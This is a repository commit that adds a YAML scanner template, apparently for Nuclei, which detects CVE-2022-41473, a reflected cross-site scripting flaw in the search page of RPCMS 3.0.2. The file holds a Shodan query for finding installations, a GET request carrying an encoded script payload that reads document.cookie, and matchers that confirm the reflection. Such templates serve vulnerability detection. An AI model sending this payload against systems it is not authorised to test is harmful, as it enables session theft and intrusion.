Create CVE-2022-41473.yaml
parent
c94829f1fd
commit
e8e6dfc13b
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2022-41473
|
||||
|
||||
info:
|
||||
name: RPCMS 3.0.2 - Cross-site scripting (XSS)
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
RPCMS v3.0.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Search function.
|
||||
reference:
|
||||
- https://github.com/ralap-z/rpcms/issues/1
|
||||
metadata:
|
||||
shodan-query: http.html:"RPCMS"
|
||||
verified: "true"
|
||||
tags: xss,cve,2022
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /search/?q=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(document.cookie)</script>"
|
||||
condition: and
|
Loading…
Reference in New Issue